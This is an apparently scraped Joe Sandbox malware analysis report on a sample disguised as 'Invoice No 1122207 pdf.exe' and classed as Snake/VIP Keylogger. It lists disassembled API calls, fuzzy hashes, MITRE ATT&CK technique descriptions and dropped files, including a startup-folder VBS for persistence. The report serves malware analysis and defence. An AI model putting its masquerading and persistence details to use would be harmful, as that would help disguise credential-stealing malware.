Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 1e22662b03c8087e3c1b3e5d204ee18d96c3293eff02331569f94aaca6c40721
Instruction ID: a42289d3ac2214fb02ac44b21cf6d6b90d49e3f233e2d72406c7fd7d07a05a55
Opcode Fuzzy Hash: 1e22662b03c8087e3c1b3e5d204ee18d96c3293eff02331569f94aaca6c40721
Instruction Fuzzy Hash: A9E0D83134431826D21037957C43FCA7A848F06B24F60447FF758555C38FE9649046ED

Function 00430D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0042F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00430D71,?,?,?,0041100A), ref: 0042F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0041100A), ref: 00430D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0041100A), ref: 00430D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00430D7F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 2c39a0950ae133ec544b63240841dce21304ca243dc62553b66265d6e6fb363c
Instruction ID: fed07d5464822113cbf13297c14df28a0f1cf339b4b02f850a8d5e0c6761e53d
Opcode Fuzzy Hash: 2c39a0950ae133ec544b63240841dce21304ca243dc62553b66265d6e6fb363c
Instruction Fuzzy Hash: 7FE06D702003518BD3709FB9E4543867BE0AF19744F008A7EE486C6651DBB8E4888B99

Function 0042E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0042E3D5

Strings

0%N, xrefs: 0042E3B5
8%N, xrefs: 0042E3CA

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%N$8%N
API String ID: 1385522511-4178720944
Opcode ID: 1a65213d45a7382c7eb62b61db8cafba2428eeae527ef17dadff786e3ed0ca5f
Instruction ID: fe2658506b5da9ddbca61f73aa50c2cbb097b142b5be2b8b4e8245d42afc07b8
Opcode Fuzzy Hash: 1a65213d45a7382c7eb62b61db8cafba2428eeae527ef17dadff786e3ed0ca5f
Instruction Fuzzy Hash: 50E02031500A74DBC604D71BB7A4AAF3359AB09325BD012BFE401CB2D6DBFC5841874D

Function 00483017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0048302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00483044

Strings

aut, xrefs: 00483038

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 11c526f36e3c188cb80f89da331bfd841544ce71cd9543a0fd7ae46f3d6a4e90
Instruction ID: acc32a86bd11759125ece02d5ff1fd36f6b75eef3aca50bf20289742e6806fbc
Opcode Fuzzy Hash: 11c526f36e3c188cb80f89da331bfd841544ce71cd9543a0fd7ae46f3d6a4e90
Instruction Fuzzy Hash: 0FD05E7290032867DA60A7A4AD4EFCB3F6CDB06750F0002A2B696E2191DAB49984CAD4

Function 0046D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0046D220

Strings

X64, xrefs: 0046D2A8
%.3d, xrefs: 0046D22B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 81253f641a5f5a98bce394ca3813c4d588d245ec96745857b2e480dcbb16bba2
Instruction ID: b52bc46e5dbfe121733fdbbb5c8bc0e645825aa0327b4366d18fcb6b8ed470db
Opcode Fuzzy Hash: 81253f641a5f5a98bce394ca3813c4d588d245ec96745857b2e480dcbb16bba2
Instruction Fuzzy Hash: 1FD012A1E08118E9CB9096D0DC559B9B77CAB09301FA084A3F80691040F72CD50AA76B

Function 004A2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004A236C
PostMessageW.USER32(00000000), ref: 004A2373

Part of subcall function 0047E97B: Sleep.KERNEL32 ref: 0047E9F3

Strings

Shell_TrayWnd, xrefs: 004A2365

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: ef623e423fce3f4c13e426aeadd1932239369e4a202ec3da9f49cd73249a9671
Instruction ID: ac2c67cecc9d447b77a96a90aaa07736c04624373e17cb5b240df6172f4988f3
Opcode Fuzzy Hash: ef623e423fce3f4c13e426aeadd1932239369e4a202ec3da9f49cd73249a9671
Instruction Fuzzy Hash: 7BD0C972781310BAE6A4A7719C4FFC66A189B16B14F114A277755AA1D0C9A4A8018A5C

Function 004A2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004A232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004A233F

Part of subcall function 0047E97B: Sleep.KERNEL32 ref: 0047E9F3

Strings

Shell_TrayWnd, xrefs: 004A2325

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: af98946ad667410fa349bd09b5931b714950f24c2c57bd5ad1c7f2d7ad803ee7
Instruction ID: fbc913306e8adad24e6f473218d0bebb824e358e1fcdcdf04cf82b47add152f2
Opcode Fuzzy Hash: af98946ad667410fa349bd09b5931b714950f24c2c57bd5ad1c7f2d7ad803ee7
Instruction Fuzzy Hash: 02D02272380310B7E6A4B731DC4FFC67E089B01B00F004A277309AA1D0C8F4A800CA0C

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Invoice No 1122207 pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\unfatiguing

C:\Users\user\AppData\Local\supergroup\ageless.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ageless.vbs

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
Invoice No 1122207 pdf.exe

Function 004142DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 004142A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00452BA5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62
COMMON

Function 0041344D Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 201
registryCOMMON

Function 00412CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 0045065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00412B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00413170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 004110F3 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 153
comCOMMON

Function 01229240 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre